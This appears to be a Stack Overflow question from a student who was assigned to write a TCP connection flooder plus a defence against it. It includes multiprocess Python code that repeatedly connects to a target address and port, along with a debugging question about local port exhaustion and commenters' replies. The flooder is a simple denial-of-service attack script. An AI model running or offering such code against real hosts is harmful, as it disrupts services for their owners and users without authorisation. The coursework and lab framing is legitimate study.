# Only one usage of each socket address (protocol/network address/port) is normally permitted error in simple Python spammer

Tags: python, sockets

My assignment was to create simple TCP flooder (just constantly connect to some TCP node) and protection against this kind of attack.

So here what I have as flooder:

```py
def ping_ponger(address, port, number, q):
print("Thread #{} is set up and running".format(number))
while q.value == 0:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((address, port))
    s.close()


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Ping-pong given node to death")
    parser.add_argument("-a", type=str, help="target node address")
    parser.add_argument("-p", type=int, help="target node port")
    parser.add_argument("-n", type=int, help="number of threads")
    parser = parser.parse_args()

    thread_list = []
    num = Value('d', 0.0)
    for x in range(parser.n):
        thread_list.append(Process(target=ping_ponger, args=(parser.a, parser.p, x, num)))
        thread_list[x].start()
    sleep(1)
    input("Press any key to end this misery")
    num.value = 1
```

Main idea was to spam from multiple threads, constantly connecting and then do nothing.
The problem is that I get this error

```
OSError: [WinError 10048] Only one usage of each socket address (protocol/network address/port) is normally permitted
```

immediately upon restarting of the code, or after 10-15 seconds of running

I'm running Win10, and connecting to another machine in my LAN, that runs WSL (Ubuntu 18) on Win10.

I tried to make sockets "timeout"

```
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
```

No luck here.
Then I just copy-pasted code from thread function into "main" Still no luck.

I think that it is because it "exhaust" free ports and then the problem arises, but I close sockets after connection, so it must not be the case here.

Whats wrong with this?

**UPD 1**
I tried running this from my WSL, and get another error

```
OSError: [Errno 98] Address already in use
```

And it is strange, because OS should provide me with a free address when i call socket.socket()

Comment: perhaps you could have it keep looking for open ports on your machine to create sockets on with a `while port_not_found` and a `try: to_find_port` setup. I don't think this will DoS somebody though if that's the idea. I believe that `s.connect((address, port))` will complete the handshake, although I'm not an expert

Comment: What does `Value('d', 0.0)` do ?  It's normal to "use up" sockets only when you create a socket-listener (`bind()`ing to a socket, until it's closed).  The error message you report typically only comes from listening, yet the OP's code does not bind/listen.  Are you sure this is the problematic code?

Comment: SO_REUSEADDR does not make sockets 'timeout'. You appear to be leaking sockets if the connect fails. In any case you are running out of local ports, and this is only to be expected with code like this.

Comment: I can't tell where in the code the errors occurs. Limit wise a TCP allow there to be opened from one interface to a single port on another interface about 65535 TCP connections.

Comment: @Kingsley it is the shared value to interrupt threads upon pressing Enter key.